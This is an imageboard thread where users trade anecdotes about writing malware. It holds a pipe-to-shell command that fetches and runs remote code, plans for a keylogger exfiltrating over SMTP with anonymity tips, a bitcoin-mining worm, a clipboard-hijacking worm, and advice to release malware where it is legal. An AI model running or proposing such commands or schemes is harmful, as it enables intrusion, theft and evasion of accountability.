
/λ/ - programming


File: 1497467099226.png (14.21 KB, 246x614, scr.PNG)

 No.241

Have you ever coded a malware?
- if yes, what language did you use;
- if no, why not?

 No.244

Made a toy malware once, in C, for OSX. Submitted immediately to Kaspersky to know if they'd consider it malicious. They did. It's been on their database ever since.

When I was younger I coded a couple of virii in vbscript. They got caught by Norton simply by heuristic, I never spread them around.

 No.247

Usually just things to play with by myself. Mostly in C, but also some assembly, particularly for DOS and Windows.
It was usually just for curiosity, I read a bit about how a virus or a worm is done, then see the source for one, and then I write something similar to what I read and test it. Nothing beyond that though.

 No.249

Damn I just realized I responded to an FBI thread.
Serves me right for using the web at all

 No.288

No never have. Wouldn't know where to start tbqhwyf

 No.298

>>241
Yes, in both Python and Ocaml. Never deployed it because I'm not a prick.
Unless you consider code that just aimlessly fucks soykaf up real malware. If that's the case, I've written malware in damn near every language just for the hyucks.

 No.394

No, but I want to. Specifically I want to make a worm that makes the machines it infects mine bitcoin for me.

 No.396

>Have you ever coded a malware?
I made a crypter "FUD" and I am trying to make the perfect keylogger, it will send the logs using SMTP, but I can't find any good email library for Windows, so I will have to code the SMTP library (it's not easy to implement the protocol), plus I am using Debian, so it's harder to code an executable for Windows :P, I need to make everything inside a slow VM. The source code for the keylogger will be released when I finish it.
The advantage of sending the logs with SMTP is that it will be anonymous for the attacker, normally, a direct connection can reveal the attacker's IP, that's dangerous for the attacker. But if you register an email using Tor (your IP won't be related to it), the only thing the victim can know is the email you used, then, you just login to your email and the logs will be there.

>What language you used?

C and CPP

 No.397

>>249
You should be posting here from behind a proxy, on a VPN, or Tor. I don't believe Virus writing to be illegal. I think it is only a crime if you release it and it causes damage.

Some countries don't have laws against data destruction such as Bulgaria. You could write and release it there and be ok.

 No.485

No but I'd like to. Not to fuck people's soykaf up or make money but just to see how it spreads. I'd love to make some virus that keeps track of through which computers it arrived and sends this to some server, this could make for some nice data visualisations :D
That said I'd probably never do it for fear of getting caught breaking into people's computers

 No.490

>>249
Writing software is not a crime. However using one to gain unauthorized access or to cause harm is a criminal offense. Software is just software and then there are intentions of the people who use or abuse them.

To answer your question OP, yes I mostly prototyped several spyware programs in Python and might recreate one of them in C++. Authoring "malware" is not an edgy thing to do and actually lots of security contractors do it for the government under more politically correct names.

Personally I hate the exploit development process but I like the payload development since it is the part where you can get more creative and use your critical thinking to make sure the software remains secure and also operates at full capacity. Real life scenarios where you are doing it as an APT is not that fun though, because then stuff like software maintenance and backwards compatibility etc. comes into play. Think it as another office software, except this time they don't know about it.

And as a bonus here is some development tradecraft from the CIA itself:
https://wikileaks.org/ciav7p1/cms/page_14587109.html

 No.510

>>241
Every time I think of doing this I can't help but open the website and start playing manually. Why is it so addictive?

 No.511

Picture with botnets…

You're pretty away from real malware.

 No.577

>>511
may i ask what's real malware?

 No.621

I played around with one in C. It was a mess though and mostly to learn a few different techniques - shell coding, obfuscation, windows internals - everything to get you started can be found on github.

 No.622

>>394
This is very difficult, for a number of reasons. It's also very detectable to the point where basic C functions that run the algo to mine Bitcoin even get picked up as "PUP" samples by AV now (Potentially Unwanted Programs).

 No.623

>>397
This is correct, at least for the United States. You can write viruses, and even sell them for a profit. But if you use them illegally, sell them to be used illegally, or if people use them illegally and you were at fault, you can get royally fucked.

Look up the current case going on with MalwareTechBlog. He allegedly was involved in the creation of the Kronos banking malware which isn't illegal by itself, but could be illegal if it was used for malicious purposes or sold with malicious intent.

 No.672

File: 1505658930676.webm (141.41 KB, 640x448, lunar.webm)

Yeah, I've written a few simple malicious scripts in vbscript / powershell / batch that would be invoked from a Word document. I do this to write something that will imitate stuff that comes into the network at my job to see if we can detect or block the attack.

The stuff we see most commonly is really boring. Just drops an exe that either encrypts the box or checks in with a C2 server for commands.

I'm sure there's more complexity to some of these infections, but I can't think of a better way to quickly reverse engineer the malware other than using one of our sandboxes, VT, or just googling to see if someone else has encountered the threat.

 No.710

I used Python (with some kinda minimal posix-dash bootstrapper iirc) because it runs on OSX and allows me to easily do whatever I want via
>curl ix.io/asdf | sh

 No.821

>>577
XSS Worms.

 No.822

File: 1508652257022.gif (508.12 KB, 500x467, Well shit source httpmemef….gif)

Other than simple babbys first keylogger and a few macros no.

honestly, I've never been too good at programming, I've been trying to get better but my skills are lacking

>mfw this isn't /cyb/

>mfw I already written my post

 No.823

>>821
>You're pretty away from real malware.
>XSS Worms.

Lol.

 No.824

>>822
> I've never been too good at programming,
With a lot of practice, you'll get the hang of it.
Programming is really not that difficult once you do it enough.

 No.828

For those who are interested in programming malware, I found this good paper about it on Exploit db!

https://www.exploit-db.com/docs/42250.pdf

 No.831

>>241
>if no why not ?
I like to improve my own system (writing scripts in bash, my own little tools in C, etc.) and sharing them with others or trying to work on bigger tools with friends and/or strangers.
Writing malware isn't interesting to me, I don't really see a point in trying to harm the computers of random people that happen to download my program.
I'm not bashing anyone that likes that side of programming, but security & penetration isn't a particular interest of mine.
I just want to write useful little programs and share them with others.

 No.838

>>241
I made a DOS malware once that rot13'd the dos fonts. It didn't infect any other files though.

 No.846

Have always considered it but never entertained any action towards it. Might do something about it in the future, however. Though I would never deploy it because recklessly destroying soykaf sounds pointless.

 No.847

It depends what you consider malware.
I've never written anything for the purpose of "recklessly destroying ѕhіt".

 No.1184

does anyone know any "security-oriented" programming communities? here's the ones i know that might give you some idea:

https://www.rohitab.com/discuss/
https://zwclose7.createaforum.com/
https://www.unknowncheats.me/

no "hackforums" tier skid communities please. just genuine people interested in os internals and system programming preferably security-oriented.

 No.1187

File: 1528595051620.png (227.47 KB, 800x334, blade-runner-anime-cowboy-….png)

>>241

Yes.
C, Bash, Powershell, Python, Java, JavaScript.

Reading this thread and realizing how low of a threat Lainchan really is. It's 2018. You guys can get paid for this type of dev.

>>1184
A million times yes. Rohitab is awesome, and zwclose7 has been my favorite since 2014.

 No.1188

A friend of mine made a worm which sits silently until a bitcoin address is copied… Once one is, the address is altered slightly and the original is uploaded to pastebin.

 No.1191

>>241
Nice bait, Honeypot-kun.

 No.1242

>>241
Yes.
It's even been on the news.
The attack was successful.
Can't tell any details, obviously.

 No.1249

File: 1530243023836.png (15.49 KB, 767x507, 1328571582913.png)

>>1242
Maybe you could tell us the story without revealing the specific case?

 No.1258

>>1242
Sure..

 No.1271

>>1242
pls, just use tor you could tell us all the details if they were.

 No.1274

>>1271
Don't believe everything someone writes on the internet. If it really was that big, he would mind 100% OPSEC and never would mention details like he already did. Or he is completely dumb.

 No.1275

>>1274
I agree with this.
I bet he is just a LARPing script kiddie.

 No.1277

left around some flash drives which autobooted a vbscript to change all system sounds to a stereotypical clown nose honk, back in college

100% worth it when I finally heard one go off in the wild


